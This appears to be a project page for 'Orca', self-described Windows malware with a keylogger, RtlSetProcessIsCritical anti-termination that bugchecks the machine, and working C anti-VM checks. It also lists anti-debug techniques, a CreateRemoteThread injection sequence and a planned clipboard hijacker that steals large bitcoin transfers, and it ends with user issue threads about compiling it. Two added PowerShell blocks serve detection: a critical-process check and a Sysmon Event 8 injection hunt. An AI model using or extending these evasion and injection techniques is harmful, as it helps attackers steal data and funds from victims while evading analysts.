Orca - Advanced malware with multiple features, written in ASM/C/C++; works on all Windows versions! (some features are still under development and not stable)

Overview

About Orca

  • Orca is an advanced malware with multiple features, written in ASM/C/C++.

Features

  • Run in Background (Hidden Mode)

  • Records keystrokes and saves them to a file.

Anti-Task Manager kill using RtlSetProcessIsCritical

  • RtlSetProcessIsCritical (an undocumented ntdll export that sets the process's ProcessBreakOnTermination flag) is used to protect the process from termination. Any attempt to terminate it, from Task Manager or anything else, bugchecks the system with CRITICAL_PROCESS_DIED (0xEF) :(
  • Caveats: setting the flag requires SeDebugPrivilege, so it only works from an elevated process; and the flag applies to every exit, including a clean one, so the malware has to clear it again (RtlSetProcessIsCritical(FALSE, ...)) before exiting, or its own exit crashes the host.
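Before an analyst kills a suspected Orca process, it pays to know whether this flag is set, because Task Manager and Stop-Process will not warn. The PowerShell below is an added example, not Orca's own code: it queries ProcessBreakOnTermination (PROCESSINFOCLASS 29) through NtQueryInformationProcess and lists every critical process on the box. OpenProcess, CloseHandle and NtQueryInformationProcess are the real kernel32/ntdll exports; the function name Test-CriticalProcess and the NativeMethods wrapper class are mine.

```powershell
# Added example (not Orca's code): ask the kernel whether a process is marked
# critical (ProcessBreakOnTermination) before terminating it. Killing a process
# with this flag set bugchecks the machine with CRITICAL_PROCESS_DIED.
if (-not ('NativeMethods' -as [type])) {
    Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class NativeMethods {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint desiredAccess, bool inheritHandle, int processId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr handle);
    // Undocumented but stable: class 29 (ProcessBreakOnTermination) returns a ULONG flag.
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(IntPtr handle, int infoClass,
        out int info, int infoLength, out int returnLength);
}
'@
}

function Test-CriticalProcess {
    # Returns $true when the process has ProcessBreakOnTermination set.
    param([Parameter(Mandatory)][int]$ProcessId)
    $PROCESS_QUERY_INFORMATION = 0x0400
    $ProcessBreakOnTermination = 29
    $h = [NativeMethods]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "OpenProcess($ProcessId) failed with Win32 error $err (elevate for system processes)"
    }
    try {
        [int]$flag = 0; [int]$returned = 0
        $status = [NativeMethods]::NtQueryInformationProcess($h, $ProcessBreakOnTermination, [ref]$flag, 4, [ref]$returned)
        if ($status -ne 0) { throw ('NtQueryInformationProcess failed, NTSTATUS 0x{0:X8}' -f $status) }
        return [bool]$flag
    }
    finally { [void][NativeMethods]::CloseHandle($h) }
}

# Inventory: every critical process on the box. smss, csrss, wininit, services
# and similar system processes are expected hits; a binary running out of a user
# profile or %TEMP% is the Orca-style case. Do not terminate it: suspend it and
# clear the flag (NtSetInformationProcess with the same class, which needs
# SeDebugPrivilege), or remove it on the next boot.
Get-Process | ForEach-Object {
    try {
        if (Test-CriticalProcess -ProcessId $_.Id) {
            [pscustomobject]@{ Id = $_.Id; Name = $_.ProcessName; Path = $_.Path }
        }
    } catch { <# access denied on protected processes is expected without admin #> }
}
```

Run it from an elevated shell, otherwise OpenProcess fails on most system processes and the catch block silently skips them; unelevated, the scan still covers anything running as your own user, which is where a dropped sample normally lives.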


  • Undetected by 60+ antivirus engines (as of the author's last scan; detection rates change as signatures are updated)


Detecting Virtual Environment Files and Processes

  • Code Snippets
  • The following function exits if a VMware Tools process is running. GetPID() is a project helper not shown on this page; the prototype below assumes it takes the image name and returns non-zero when such a process exists.
#include <stdlib.h>

int GetPID(const char* imageName);   /* project helper, defined elsewhere (assumed signature) */

/* Exit if any VMware Tools process is running. */
void antiVm()
{
	const char* arr[] = { "vmtoolsd.exe", "vmwaretray.exe", "vmwareuser.exe", "VGAuthService.exe", "vmacthlp.exe" };
	/* The original looped up to strlen(*arr), the length of the first string (12),
	   not the number of entries (5), and so read past the end of the array. */
	for (size_t i = 0; i < sizeof(arr) / sizeof(arr[0]); i++)
	{
		if (GetPID(arr[i]))
			exit(EXIT_FAILURE);
	}
}
  • The following function exits if a VirtualBox Guest Additions driver or DLL is present. IsExist() is a project helper not shown on this page (assumed: takes a path, returns non-zero if it exists). The list is the original one, restructured as a table; note that it hardcodes C:\windows instead of reading %SystemRoot%.
#include <stdlib.h>

int IsExist(const char* path);   /* project helper, defined elsewhere (assumed signature) */

/* Exit if any VirtualBox Guest Additions artifact is installed. */
void antiVr() {
	const char* files[] = {
		"C:\\windows\\System32\\vboxoglpackspu.dll",
		"C:\\windows\\System32\\Drivers\\VBoxSF.sys",
		"C:\\windows\\System32\\Drivers\\VBoxVideo.sys",
		"C:\\windows\\System32\\vboxoglpassthroughspu.dll",
		"C:\\windows\\System32\\vboxdisp.dll",
		"C:\\windows\\System32\\vboxhook.dll",
		"C:\\windows\\System32\\vboxmrxnp.dll",
		"C:\\windows\\System32\\vboxogl.dll",
		"C:\\windows\\System32\\vboxoglcrutil.dll",
		"C:\\windows\\System32\\Drivers\\VBoxGuest.sys",
		"C:\\windows\\System32\\vboxoglerrorspu.dll",
		"C:\\windows\\System32\\vboxoglfeedbackspu.dll",
		"C:\\windows\\System32\\Drivers\\VBoxMouse.sys",
		"C:\\windows\\System32\\vboxoglarrayspu.dll",
	};
	for (size_t i = 0; i < sizeof(files) / sizeof(files[0]); i++)
	{
		if (IsExist(files[i]))
			exit(EXIT_FAILURE);
	}
}

Anti-Debug

  • The malware silently exits whenever it detects a debugger or finds itself being debugged, using the AntiDBG library.
  • The techniques used to detect debuggers, by category:
  - Memory: debugger state left in the process itself (PEB BeingDebugged and NtGlobalFlag, heap flags, debug-port queries)
  - CPU: hardware breakpoints visible in the debug registers of the thread context
  - Timing: an unexpectedly large gap between two timestamps taken around code a debugger would single-step
  - Forced Exceptions: deliberately raised exceptions (INT 3, single-step and the like) that a debugger swallows instead of passing to the program's own handler

Process Injection

  • Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. (This is the MITRE ATT&CK T1055 description.)


TECHNICAL DETAILS

  • OpenProcess on the target with the access rights CreateRemoteThread requires: PROCESS_CREATE_THREAD, PROCESS_QUERY_INFORMATION, PROCESS_VM_OPERATION, PROCESS_VM_WRITE and PROCESS_VM_READ.
  • VirtualAllocEx allocates a buffer in the target's virtual address space (committed and, for shellcode, executable: PAGE_EXECUTE_READWRITE, or RW followed by VirtualProtectEx to RX).
  • WriteProcessMemory copies the payload into that buffer: the shellcode itself, or, for LoadLibrary-style DLL injection, the path of the DLL.
  • CreateRemoteThread creates a thread inside the target process. Its lpStartAddress parameter (an LPTHREAD_START_ROUTINE) must be an address that is valid in the target, not in the injector: the injected buffer for shellcode, or the address of LoadLibraryA for DLL injection (the same in every process, because kernel32.dll is mapped at one base across processes within a boot session).
  • Caveat: the thread creation itself is visible to defenders (Sysmon Event ID 8, kernel thread-creation callbacks used by EDR), so "masked under a legitimate process" hides where the payload came from, not the act of injecting it.
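The sequence above leaves a characteristic record in Sysmon Event ID 8 (CreateRemoteThread): a thread whose start address no loaded module owns (VirtualAllocEx'd shellcode), or one that starts at LoadLibraryA/W in kernel32 (DLL injection). The PowerShell below is an added hunting example, not Orca's code. It assumes Sysmon is installed with CreateRemoteThread logging enabled in its configuration and is run from an elevated shell; the function name Get-SuspiciousRemoteThreads and the starting allow-list of source images are mine.

```powershell
# Added example (not Orca's code): hunt for the CreateRemoteThread injection
# pattern in Sysmon Event ID 8 records.
function Get-SuspiciousRemoteThreads {
    param(
        [int]$MaxEvents = 1000,
        # Source images allowed to create remote threads on this estate. This is a
        # constructed starting point; tune it against your own baseline.
        [string[]]$AllowedSources = @(
            "$env:SystemRoot\System32\csrss.exe",
            "$env:SystemRoot\System32\svchost.exe"
        )
    )
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 8 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        # Read fields by name from the event XML; positional Properties[] indexes
        # shift between Sysmon schema versions.
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($item in $xml.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }

        # Shellcode written with VirtualAllocEx/WriteProcessMemory starts in memory
        # no module owns, so Sysmon leaves StartModule empty. DLL injection instead
        # starts at LoadLibraryA/W inside kernel32.
        $reason = $null
        if ([string]::IsNullOrEmpty($d['StartModule']))   { $reason = 'thread starts in unbacked memory' }
        elseif ($d['StartFunction'] -like 'LoadLibrary*')  { $reason = 'thread starts at LoadLibrary (DLL injection)' }

        if ($reason -and ($AllowedSources -notcontains $d['SourceImage'])) {
            [pscustomobject]@{
                UtcTime       = $d['UtcTime']
                Source        = '{0} ({1})' -f $d['SourceImage'], $d['SourceProcessId']
                Target        = '{0} ({1})' -f $d['TargetImage'], $d['TargetProcessId']
                StartAddress  = $d['StartAddress']
                StartFunction = $d['StartFunction']
                Reason        = $reason
            }
        }
    }
}

Get-SuspiciousRemoteThreads | Format-Table -AutoSize
```

Expect some noise from legitimate injectors (accessibility tools, some AV products, csrss during process start-up); put those in the allow-list by full image path rather than by file name, since a malware dropper can be named anything.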

More advanced features will be added soon, like:

  • 🔥 Crypto Grabber (clipboard hijacking: the malware watches the clipboard for a cryptocurrency wallet address and replaces it with the attacker's). I will add a special update so you can target big holders, e.g. the malware acts only when the victim is about to transfer a specific amount of bitcoin to a specific wallet (like >400 bitcoin) ...

Disclaimer

  • I take no responsibility for harmful use or any damage this may cause. Use it at your own risk.
Issues

  • compile

    hi there, how could I compile this program? I don't have knowledge in C++ so I am not able to compile. I am using the g++ orca.cp command to compile but it gave an error.

    help wanted · opened by tinaayam · 2

  • application error

    hi there, I downloaded the exe provided in the releases. It gave various errors which I fixed by installing the required packages, but still it is giving an error when I am trying to launch Orca. Here is the error:

    Orca.exe - Application Error: The application was unable to start correctly (0xc000007b). Click OK to close the application.

    What are the possible ways to fix this error? I have tried launching using administrator rights but still the problem is the same.

    help wanted · opened by tinaayam · 1